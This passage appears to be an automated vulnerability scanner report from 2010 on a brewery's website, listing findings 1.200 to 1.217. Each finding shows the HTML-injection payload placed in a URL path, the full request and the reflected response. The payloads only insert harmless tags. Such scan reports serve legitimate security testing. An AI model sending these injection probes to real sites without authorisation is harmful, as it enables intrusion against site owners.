       <base href="http://www.n
...[SNIP]...
<body id="merchandise25227"><a>b79974bebcc_page" class="merchandise25227">
...[SNIP]...

1.200. http://www.ninkasibrewing.com/merchandise/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /merchandise/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89685"><a>8d9b398e636 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /merchandise89685"><a>8d9b398e636/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="merchandise89685"><a>8d9b398e636_page" class="merchandise89685">
...[SNIP]...

1.201. http://www.ninkasibrewing.com/merchandise/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /merchandise/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bca3"><a>74020e256ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /merchandise3bca3"><a>74020e256ae/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="merchandise3bca3"><a>74020e256ae_page" class="merchandise3bca3">
...[SNIP]...

1.202. http://www.ninkasibrewing.com/merchandise/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /merchandise/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3133"><a>eb248c2c902 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /merchandised3133"><a>eb248c2c902/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="merchandised3133"><a>eb248c2c902_page" class="merchandised3133">
...[SNIP]...

1.203. http://www.ninkasibrewing.com/merchandise/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /merchandise/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea445"><a>ad2f0e43886 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /merchandiseea445"><a>ad2f0e43886/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="merchandiseea445"><a>ad2f0e43886_page" class="merchandiseea445">
...[SNIP]...

1.204. http://www.ninkasibrewing.com/nw_local_challenge/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /nw_local_challenge/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db203"><a>4f8704b46ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nw_local_challengedb203"><a>4f8704b46ee/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="nw_local_challengedb203"><a>4f8704b46ee_page" class="nw_local_challengedb203">
...[SNIP]...

1.205. http://www.ninkasibrewing.com/nw_local_challenge/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /nw_local_challenge/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38544"><a>e12729cb39a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nw_local_challenge38544"><a>e12729cb39a/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="nw_local_challenge38544"><a>e12729cb39a_page" class="nw_local_challenge38544">
...[SNIP]...

1.206. http://www.ninkasibrewing.com/nw_local_challenge/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /nw_local_challenge/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81cc4"><a>8f45631c571 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nw_local_challenge81cc4"><a>8f45631c571/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="nw_local_challenge81cc4"><a>8f45631c571_page" class="nw_local_challenge81cc4">
...[SNIP]...

1.207. http://www.ninkasibrewing.com/nw_local_challenge/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /nw_local_challenge/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54de6"><a>a3833a021cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nw_local_challenge54de6"><a>a3833a021cc/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="nw_local_challenge54de6"><a>a3833a021cc_page" class="nw_local_challenge54de6">
...[SNIP]...

1.208. http://www.ninkasibrewing.com/nw_local_challenge/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /nw_local_challenge/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95d04"><a>66d6e311014 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nw_local_challenge95d04"><a>66d6e311014/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="nw_local_challenge95d04"><a>66d6e311014_page" class="nw_local_challenge95d04">
...[SNIP]...

1.209. http://www.ninkasibrewing.com/nw_local_challenge/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /nw_local_challenge/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c482f"><a>c37a6af9fd4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nw_local_challengec482f"><a>c37a6af9fd4/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="nw_local_challengec482f"><a>c37a6af9fd4_page" class="nw_local_challengec482f">
...[SNIP]...

1.210. http://www.ninkasibrewing.com/nw_local_challenge/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /nw_local_challenge/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa881"><a>c321163ae3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nw_local_challengefa881"><a>c321163ae3c/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="nw_local_challengefa881"><a>c321163ae3c_page" class="nw_local_challengefa881">
...[SNIP]...

1.211. http://www.ninkasibrewing.com/process/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /process/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a9d3"><a>dfa1e21e09f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /process7a9d3"><a>dfa1e21e09f/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="process7a9d3"><a>dfa1e21e09f_page" class="process7a9d3">
...[SNIP]...

1.212. http://www.ninkasibrewing.com/process/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /process/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92128"><a>951cf91d628 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /process92128"><a>951cf91d628/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="process92128"><a>951cf91d628_page" class="process92128">
...[SNIP]...

1.213. http://www.ninkasibrewing.com/process/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /process/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da51d"><a>b4ca083e972 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /processda51d"><a>b4ca083e972/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="processda51d"><a>b4ca083e972_page" class="processda51d">
...[SNIP]...

1.214. http://www.ninkasibrewing.com/process/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /process/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 464a8"><a>b51a0c71a0d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /process464a8"><a>b51a0c71a0d/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 21 Nov 2010 21:54:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="process464a8"><a>b51a0c71a0d_page" class="process464a8">
...[SNIP]...

1.215. http://www.ninkasibrewing.com/process/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /process/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e00c"><a>fc68d60c0f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /process6e00c"><a>fc68d60c0f3/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="process6e00c"><a>fc68d60c0f3_page" class="process6e00c">
...[SNIP]...

1.216. http://www.ninkasibrewing.com/process/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /process/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3479d"><a>5af2bfd9467 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /process3479d"><a>5af2bfd9467/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="process3479d"><a>5af2bfd9467_page" class="process3479d">
...[SNIP]...

1.217. http://www.ninkasibrewing.com/process/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /process/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ec8c"><a>3f99d872435 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /process8ec8c"><a>3f99d872435/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
